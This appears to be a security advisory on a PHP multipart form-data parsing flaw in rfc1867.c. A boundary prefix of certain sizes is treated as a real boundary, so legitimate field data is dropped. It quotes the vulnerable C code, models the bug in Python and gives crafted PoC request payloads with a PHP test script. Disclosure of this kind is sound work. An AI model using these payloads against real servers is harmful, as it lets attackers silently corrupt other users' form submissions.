Summary
Erroneous parsing of multipart form data contained in an HTTP POST request could lead to legitimate data not being processed, thus violating data integrity.
Details
A bug was discovered in the parsing of multipart form data contents, affecting both file and input form data. If a multipart form data payload contains a valid prefix X of the defined boundary B such that 5 KiB < |X| < |B| < 8 KiB, the logic responsible for parsing and storing the multipart payload fails to correctly extract the contents between two boundaries. This results in a violation of data integrity. The issue lies in the partial match handling in the following function:
// main/rfc1867.c:556
/*
 * Search for a string in a fixed-length byte string.
 * If partial is true, partial matches are allowed at the end of the buffer.
 * Returns NULL if not found, or a pointer to the start of the first match.
 */
static void *php_ap_memstr(char *haystack, int haystacklen, char *needle, int needlen, int partial)
{
    int len = haystacklen;
    char *ptr = haystack;
    /* iterate through first character matches */
    while( (ptr = memchr(ptr, needle[0], len)) ) {
        /* calculate length after match */
        len = haystacklen - (ptr - (char *)haystack);
        if (memcmp(needle, ptr, needlen < len ? needlen : len) == 0 && (partial || len >= needlen)) { // partial match here if partial != 0
            break;
        }
        /* next character */
        ptr++; len--;
    }
    return ptr;
}
php_ap_memstr is called by the following functions when the contents between two boundaries have to be extracted after the MIME headers have been parsed:
// main/rfc1867.c:580
static size_t multipart_buffer_read(multipart_buffer *self, char *buf, size_t bytes, int *end)
{
    size_t len, max;
    char *bound;
    /* fill buffer if needed */
    if (bytes > (size_t)self->bytes_in_buffer) {
        fill_buffer(self);
    }
    int i=0;
    while (self->buf_begin[i] && self->buf_begin[i] != '\r' ) i++;
    /* look for a potential boundary match, only read data up to that point */
    if ((bound = php_ap_memstr(self->buf_begin, self->bytes_in_buffer, self->boundary_next, self->boundary_next_len, 1))) { // partial match on
        max = bound - self->buf_begin;
        if (end && php_ap_memstr(self->buf_begin, self->bytes_in_buffer, self->boundary_next, self->boundary_next_len, 0)) {
            *end = 1;
        }
    } else {
        max = self->bytes_in_buffer;
    }
    /* maximum number of bytes we are reading */
    len = max < bytes-1 ? max : bytes-1;
    /* if we read any data... */
    if (len > 0) {
        /* copy the data */
        memcpy(buf, self->buf_begin, len);
        buf[len] = 0;
        if (bound && len > 0 && buf[len-1] == '\r') {
            buf[--len] = 0;
        }
        /* update the buffer */
        self->bytes_in_buffer -= (int)len;
        self->buf_begin += len;
    }
    return len;
}
/*
  XXX: this is horrible memory-usage-wise, but we only expect
  to do this on small pieces of form data.
*/
static char *multipart_buffer_read_body(multipart_buffer *self, size_t *len)
{
    char buf[FILLUNIT], *out=NULL; // FILLUNIT = 5*1024
    size_t total_bytes=0, read_bytes=0;
    while((read_bytes = multipart_buffer_read(self, buf, sizeof(buf), NULL))) {
        out = erealloc(out, total_bytes + read_bytes + 1);
        memcpy(out + total_bytes, buf, read_bytes);
        total_bytes += read_bytes;
    }
    if (out) {
        out[total_bytes] = '\0';
    }
    *len = total_bytes;
    return out;
}
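The interaction between the three functions quoted above can be sketched with a small Python model. This is an illustration under stated assumptions, not the PHP implementation: `memstr` and `read_once` are hypothetical names, the buffer is a plain `bytes` object, `fill_buffer` is not modelled (it is not shown in this advisory), and the needle is assumed to have the form `\n--<boundary>`. The sketch suggests that when the buffered data ends inside a boundary prefix, a read can return 0 bytes, which is the same value the `while` loop in `multipart_buffer_read_body` treats as the end of the body.

```python
def memstr(haystack: bytes, needle: bytes, partial: bool):
    """Model of php_ap_memstr: return the offset of the first match, or None."""
    pos = 0
    while True:
        pos = haystack.find(needle[:1], pos)
        if pos == -1:
            return None
        remaining = len(haystack) - pos
        n = min(len(needle), remaining)
        # With partial=True, a needle prefix that runs to the end of the
        # buffer counts as a match.
        if haystack[pos:pos + n] == needle[:n] and (partial or remaining >= len(needle)):
            return pos
        pos += 1


def read_once(buffered: bytes, needle: bytes, limit: int) -> bytes:
    """Model of one multipart_buffer_read call on already-buffered data (no refill)."""
    bound = memstr(buffered, needle, partial=True)
    max_len = bound if bound is not None else len(buffered)
    length = min(max_len, limit - 1)
    chunk = buffered[:length]
    # Mirror the trailing '\r' strip applied when a (partial) boundary was found.
    if bound is not None and chunk.endswith(b"\r"):
        chunk = chunk[:-1]
    return chunk


FILLUNIT = 5 * 1024
boundary = b"e932eddb2559cca708c5cb806f24abfb"
needle = b"\n--" + boundary  # assumed form of boundary_next

# Buffer holds the field data and ends inside the boundary prefix.
first = read_once(b"A" * 5112 + b"\r\n--e932", needle, FILLUNIT)
# Hypothetical next state: only the prefix is buffered, nothing new arrived.
second = read_once(b"\r\n--e932", needle, FILLUNIT)
# Same prefix, but with the rest of the request already buffered.
third = read_once(b"\r\n--e932\n--" + boundary + b"--", needle, FILLUNIT)

print(len(first), second, third)
```

In this model the second call yields an empty chunk, so a caller that loops until a read returns 0 would stop there, while the third call, which sees the full closing boundary, returns the prefix as ordinary data. Which of these buffer states actually occurs depends on how the request body is delivered to the parser.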
PoC
The Python payloads below were used in a PHP-FPM environment behind an Nginx server. No particular configuration was used to couple the services. Two payloads triggering the bug are presented below:
# payload 1 - the string "\r\n--e932" is not included in the data structure
# that is later passed to the PHP script
boundary = "e932eddb2559cca708c5cb806f24abfb"
content_type = f"multipart/form-data; boundary={boundary}"
msg2 = f'--{boundary}\r\nContent-Disposition: form-data; name="koko"\r\n\r\n' \
+ 'A'*(5068+44) + f'\r\n--e932\n--{boundary}--'
# payload 2 - the string f'\r\n--{boundary[:len(boundary)-5]}' + 'C'*100 is again
# not included in the data structure that is later passed to the PHP script
boundary = 'A'*(6*1024)
content_type = f"multipart/form-data; boundary={boundary}"
body = f'--{boundary}\r\n' + 'Content-Disposition: form-data; name="koko"\r\n\r\n' \
+ f'BBB\r\n--{boundary[:len(boundary)-5]}' + 'C'*100 + f"\r\n--{boundary}--"
The payloads above show that a prefix of the boundary is treated as a valid boundary, and that processing of the data following this prefix stops.
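The byte counts in the two payloads can be checked against the sizes mentioned in this advisory. The sketch below only does arithmetic on the payload strings; `FILLUNIT` is taken from the comment in `multipart_buffer_read_body`, and the variable names are illustrative. That the first payload is sized so the prefix ends exactly at the end of a full buffer is an inference from these numbers, not something the advisory states.

```python
FILLUNIT = 5 * 1024  # buffer size, from the comment in multipart_buffer_read_body

# Payload 1: field data up to and including the boundary prefix "\r\n--e932".
field1 = "A" * (5068 + 44) + "\r\n--e932"
field1_fills_buffer = len(field1) == FILLUNIT

# Payload 2: X is the truncated boundary, B is the full boundary.
boundary2 = "A" * (6 * 1024)
x_len = len(boundary2[:len(boundary2) - 5])
b_len = len(boundary2)
size_condition_holds = 5 * 1024 < x_len < b_len < 8 * 1024

print(len(field1), field1_fills_buffer)
print(x_len, b_len, size_condition_holds)
```

The second payload satisfies the condition 5 KiB < |X| < |B| < 8 KiB from the Details section, while the first uses a short boundary and instead pads the field so that the data plus the prefix add up to one `FILLUNIT`.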
The following PHP script can be used to illustrate the bug by writing the contents of the form field to a file:
<?php
// Write the submitted "koko" field to a file so its contents can be inspected.
$name = $_POST['koko'];
$file_path = '/tmp/parsing-bug.txt';
$file = fopen($file_path, 'w');
if ($file) {
    fwrite($file, $name . PHP_EOL);
    fclose($file);
    echo 'The name has been successfully written to the file.';
}
To confirm that the 100 "C"s from the second payload are not included in the resulting file:
# tr -cd 'C' < /tmp/parsing-bug.txt | wc -c
0
Impact
The parsing bug violates data integrity. If an attacker can insert a maliciously crafted payload at a chosen location alongside other legitimate user payloads, and also controls other parts of the request such as the boundary, they can cause portions of the legitimate data to be excluded.